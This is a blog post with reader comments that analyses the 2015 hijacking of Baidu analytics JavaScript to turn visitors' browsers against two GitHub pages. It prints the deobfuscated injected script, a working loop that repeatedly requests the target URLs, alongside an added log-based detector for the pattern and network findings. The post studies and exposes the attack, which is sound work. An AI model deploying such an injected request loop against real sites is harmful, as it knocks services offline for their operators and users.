Baidu’s traffic hijacked to DDoS GitHub.com [Updated]

UPDATE:

Netresec has done a really professional analysis of this matter. Too bad the attack stopped before I could capture some packets.
Here are their findings:

http://www.netresec.com/?page=Blog&month=2015-03&post=China%27s-Man-on-the-Side-Attack-on-GitHub

Robert Graham from Errata Security also pinpointed the exact location where the attack took place using HTTP traceroute:

http://blog.erratasec.com/2015/04/pin-pointing-chinas-attack-against.html

You can do the same by modifying this tool which was used to locate the nodes of GFW:

https://github.com/mothran/mongol


As a Chinese living outside of China, I frequently visit Chinese websites, many of which use advertising and visitor tracking provided by Baidu, the largest search engine in China. As I was browsing one of the most popular Chinese infosec communities, zone.wooyun.org, at around 12:00pm GMT+8, my browser suddenly started to pop up JS alerts every 5 seconds.

[Screenshot: the JS alert]

My first thought was that someone naughty had XSSed the page, so I opened the developer tools to find the source of the XSS.

[Screenshot: JS event]

Almost instantly I saw that it kept trying to load two URLs, github.com/greatfire/ and github.com/cn-nytimes/, every few seconds.

After some digging I located the source of the JS that did it, a piece of code at the bottom of each page:

<div style="display: none;"><script type="text/javascript">
var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://");
document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3F3faf3a47435cc512f3b86dc12af100d0' type='text/javascript'%3E%3C/script%3E"));
</script></div>

This is the Baidu user tracking code, just like the Google Analytics code you would see on other websites.

All the function calls were triggered from this file, so I opened http://hm.baidu.com/h.js in the browser:

[Screenshot: obfuscated h.js source]

It seems to have been obfuscated. No custom JS bytecode VM? You call that JS obfuscation? …piece of cake:

// Load jQuery from Baidu's CDN, falling back to jquery.com if that fails
document.write("<script src='http://libs.baidu.com/jquery/2.0.0/jquery.min.js'>\x3c/script>");
!window.jQuery && document.write("<script src='http://code.jquery.com/jquery-latest.js'>\x3c/script>");
startime = (new Date).getTime();
var count = 0;

function unixtime() {
    var a = new Date;
    // note: getDay() is the weekday, not the day of month; only the parity of the result is used below
    return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3
}
url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"];
NUM = url_array.length;

function r_send2() {
    // pick one of the two targets based on the current second
    var a = unixtime() % NUM;
    get(url_array[a])
}

function get(a) {
    var b;
    $.ajax({
        url: a,
        dataType: "script",
        timeout: 1E4,
        cache: !0,
        beforeSend: function() {
            requestTime = (new Date).getTime()
        },
        complete: function() {
            responseTime = (new Date).getTime();
            b = Math.floor(responseTime - requestTime);
            // keep going for 5 minutes (3E5 ms) after the script loaded, waiting one round-trip time between requests
            3E5 > responseTime - startime && (r_send(b), count += 1)
        }
    })
}

function r_send(a) {
    setTimeout("r_send2()", a)
}
// first request fires 2 seconds after the script loads
setTimeout("r_send2()", 2E3);

Every 2 seconds, as you can see from setTimeout("r_send2()", 2E3), it will try to load a random URL from

["https://github.com/greatfire/", "https://github.com/cn-nytimes/"]

I asked some of my friends in China to open the JS file from Baidu.com; it was blank, as it is supposed to be: the server displays a blank page if the request does not have an HTTP referrer.

Apparently many other people have discovered it too:

[Screenshots: two other reports of the same behaviour]

Appears to be HTTP hijacking.

I scanned hm.baidu.com with Nmap; only two ports were open, 80 and 443.
The SSL connection was not hijacked:

[Screenshot: SSL connection check]

[Screenshot: nmap output]

Traceroute:

[Screenshot: mtr traceroute]

It is also worth noting that on port 80 the web server was lighttpd, but on port 443 it was Apache.

What is happening here is pretty clear now:
A certain device at the border between China's inner network and the Internet has hijacked the HTTP connections that went into China, replacing some JavaScript files from Baidu with malicious ones that load

["https://github.com/greatfire/", "https://github.com/cn-nytimes/"]

every two seconds.
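The injected loop leaves a recognisable footprint on the targeted site: one client hitting the same two paths a few seconds apart, with Referer headers pointing at unrelated third-party pages rather than the site itself. The following detector, an added example that is not part of the original post, runs over constructed combined-format access log lines and flags clients matching that pattern (the thresholds and sample addresses are assumptions):

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import median
from urllib.parse import urlsplit

# Constructed sample of a combined-format access log on the targeted site (not real data).
SAMPLE_LOG = """\
203.0.113.7 - - [26/Mar/2015:04:10:02 +0000] "GET /greatfire/ HTTP/1.1" 200 5120 "http://zone.wooyun.org/content/1" "Mozilla/5.0"
203.0.113.7 - - [26/Mar/2015:04:10:04 +0000] "GET /cn-nytimes/ HTTP/1.1" 200 5120 "http://zone.wooyun.org/content/1" "Mozilla/5.0"
203.0.113.7 - - [26/Mar/2015:04:10:06 +0000] "GET /greatfire/ HTTP/1.1" 200 5120 "http://zone.wooyun.org/content/1" "Mozilla/5.0"
203.0.113.7 - - [26/Mar/2015:04:10:09 +0000] "GET /cn-nytimes/ HTTP/1.1" 200 5120 "http://zone.wooyun.org/content/1" "Mozilla/5.0"
203.0.113.7 - - [26/Mar/2015:04:10:11 +0000] "GET /greatfire/ HTTP/1.1" 200 5120 "http://zone.wooyun.org/content/1" "Mozilla/5.0"
198.51.100.9 - - [26/Mar/2015:04:10:03 +0000] "GET /greatfire/ HTTP/1.1" 200 5120 "https://github.com/greatfire" "Mozilla/5.0"
198.51.100.9 - - [26/Mar/2015:04:15:40 +0000] "GET /cn-nytimes/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"$')
TARGET_PATHS = {"/greatfire/", "/cn-nytimes/"}   # the two URLs in the injected script

def detect_injected_loop(log_text, targets=TARGET_PATHS, own_host="github.com",
                         min_hits=4, max_median_gap=12.0):
    """Flag clients whose hits on the target paths look like the injected loop: repeated
    requests a few seconds apart (2 s initial delay, then one request per completed response,
    10 s timeout) whose Referers come from unrelated third-party pages, not from own_host."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["path"] not in targets:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z").timestamp()
        ref_host = urlsplit(m["referer"]).hostname if m["referer"] != "-" else None
        hits[m["ip"]].append((ts, m["path"], ref_host))
    flagged = {}
    for ip, events in hits.items():
        if len(events) < min_hits:
            continue
        events.sort(key=lambda e: e[0])
        times = [t for t, _, _ in events]
        gaps = [b - a for a, b in zip(times, times[1:])]
        third_party = {h for _, _, h in events if h and h != own_host and not h.endswith("." + own_host)}
        if median(gaps) <= max_median_gap and third_party:
            flagged[ip] = {"hits": len(events), "median_gap": median(gaps),
                           "span_s": times[-1] - times[0],   # one burst lasts at most 300 s per page load
                           "paths": sorted({p for _, p, _ in events}),
                           "referers": sorted(third_party)}
    return flagged
```

The flagged Referer hosts are the pages whose embedded analytics script was replaced, which is the list a defender would want to hand to the affected site operators.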

OK, that explained something but not everything: why did it start alerting the user with

Warning: malicious javascript detected on this domain

When I opened one of the URLs being DDoSed above, the content was:

alert("WARNING: malicious javascript detected on this domain")

Very clever: using alert() blocks script execution, which prevents the code from being called in a loop. Maybe it was done by GitHub or GreatFire themselves, who knows.

Conclusion:

Remember this?

http://furbo.org/2015/01/22/fear-china/

In other words, even people outside China are being weaponized to target things the Chinese government does not like, for example, freedom of speech.

EDIT:

By the time I posted this article, the attack had stopped and then evolved to use other JavaScript files from Sina blog.

  1. Are there any ways to solve this problem yet? I’m getting really annoyed by the constant pop-ups :sad:

  2. Hi, nice to see a different perspective on this GitHub attack. I have a question for you. ES File Explorer for Android (Play Store app) uses Baidu analytics; I confirmed this with a packet capture and analysis at cloudshark.com. Could these connections be used by Great Cannon to either perform another DDoS attack, or even have malware delivered to a device that had connected to servers in China? I read the report by the Toronto group. The reason I ask is that there are many apps by Chinese developers, such as browsers, security apps, and other productivity apps, that have too many permissions in most cases. I believe most of these are calling home for a variety of reasons, but Baidu analytics for sure. Any information would be appreciated. Thanks.

  3. Sorry, the QQ group lookup can no longer be accessed. Do you know when it will be restored?
